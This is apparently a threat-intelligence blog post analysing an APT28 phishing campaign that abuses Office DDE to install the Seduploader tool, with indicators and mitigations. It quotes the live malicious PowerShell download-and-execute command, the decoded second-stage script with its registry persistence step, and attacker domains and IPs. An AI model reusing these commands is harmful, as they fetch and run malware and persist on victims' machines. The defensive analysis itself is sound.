FancyBear Exploits NYC Terrorism Fears In Latest Spear Phishing Campaign

APT28’s latest campaign uses both a US Army exercise codenamed SabreGuardian and a recent ISIS attack in Manhattan to spread malware.

APT28, (also known as FancyBear, Sofacy, Sednit, and Pawn Storm) the Russian-speaking actors allegedly tied to the Kremlin, have launched another campaign. The latest, thought to have started in late October according to McAfee’s report, utilises the recently discovered DDE exploit in Microsoft Office applications to download the Seduploader reconnaissance tool onto target machines in two stages.

The seemingly blank documents, named “IsisAttackInNewYork.docx” and “SabreGaurdian.docx”, reference current events — the recent attack in Manhattan claimed by ISIS, and the ongoing US military operation in Eastern Europe.

APT28 have proven that state-sponsored campaigns don’t always rely on zero-days, but instead observe new techniques and exploits as they arise, likely rooting themeselves in the large Information Security communities on social media sites like Twitter.


THE EXPLOIT

DDEDownloader works by exploiting the DDE (Dynamic Data Exchange) protocol designed to allow data transfers between applications. The exploit, also used to spread Locky and TrickBot, leverages the legitimate Microsoft feature to carry out code execution, requiring no user input.

Analysis of one sample, “IsisAttackInNewYork.docx” shows how the DDEDownloader exploit is being used in the wild.

Filename: IsisAttackInNewYork.docx
SHA1: 1c6c700ceebfbe799e115582665105caa03c5c9e

C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://netmediaresources.com/config.txt');powershell -enc $e #.EXE

Once executed, the document invokes Powershell, using the above command as a GET request to netmediaresources[.]com for a file called config.txt.

 GET /config.txt HTTP/1.1
Host: netmediaresources.com
Connection: Keep-Alive”
“GET /media/resource/vms.dll HTTP/1.1
Host: netmediaresources.com
Connection: Keep-Alive

The retrieved config.txt file contains a second Powershell command encoded in Base64. The command decodes as below:

$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+”\vms.dll”);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile(“hxxp://netmediaresources[.]com/media/resource/vms.dll “,$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;
$p_a=$p+”,#1″;
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+”\vms.bat”);
$text=’set inst_pck = “%ALLUSERSPROFILE%\vms.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start rundll32.exe %inst_pck %,#1’
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;
New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -PropertyType String -Force | Out-Null;
}

The PowerShell scripts contact netmediaresources[.]com/media/resource/vms.dll to download APT28-created reconnaissance tool SedUploader:

Filename: vms.dll
File Description: Version Master Service
File version:
5.1.9200.20789
Compilation timestamp: 2017–10–31 20:11:10
Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7
C2: webviewres[.]net

Seduploader uses the New-ItemProperty parameter to create a Windows shell script under the registry key HKCU\Environment\UserInitMprLogonScript to establish persistence. The vms.bat file seen in the encoded Powershell command is used as a logon script that will run under all user profiles.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='C:\Windows'+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;)

Seduploader then determines whether the system is of interest by scanning for artefacts that identify it. If the system proves to be of interest, a second stage payload is usually downloaded, such as X-Agent.

DOMAINS

The distribution site, netmediaresources[.]com was registered on 
2017–10–19 with Tucows Domains Inc.

Registrar: Tucows Domains Inc.
Organization: 1337 Services LLC (registrant, admin, tech)
NameServers: ns1.njal.la, ns2.njal.la

The C2, webviewres[.]net was registered on 2017–10–25, also with Tucows Domains Inc. The two domains share the same nameservers.

Registrar: Tucows Domains Inc.
Organization: 1337 Services LLC (registrant, admin, tech)
NameServers: ns1.njal.la, ns2.njal.la

MITIGATION

The DDE exploit has been recognized and classified by Microsoft as Exploit:O97M/DDEDownloader.A. Mitigation methods are outlined in Microsoft Security Advisory 4053440.

For the registry modifications — where <version> is the version of Microsoft Office (14.0, 15.0 or 16.0).

[HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Options]
DontUpdateLinks(DWORD)=1

For Microsoft Office 2007, the registry entry is slightly different:

[HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Options\vpref]
fNoCalclinksOnopen_90_1(DWORD)=1

The Windows 10 Fall Creators Update aims to mitigate these kind of attacks using Windows Defender’s Exploit Guard. Attack Surface Reduction (ASR) technology can block Office applications from spawning child processes like those seen in DDEDownloader attacks.

Additionally, NVISO have published YARA rules for DDE Exploit detection here.


ARTEFACTS

webviewres.net
netmediaresources.com

185.216.35.26
 89.34.111.160
 5.104.105.195

1c6c700ceebfbe799e115582665105caa03c5c9e
4bc722a9b0492a50bd86a1341f02c74c0d773db7
f6d380b256b0e66ef347adc78195fd0f228b3e33

HYBRID ANALYSIS

https://www.hybrid-analysis.com/sample/55fc23f006b9beb777ab1423af4cd6b2a10ca1e144a0580b2ec85c321732c036?environmentId=100

https://www.hybrid-analysis.com/sample/11cd541511cc793e7416655cda1e100d0a70fb043dfe7f6664564b91733431d0?environmentId=100

Corrections, comments: @0x736a
Image: Crowdstrike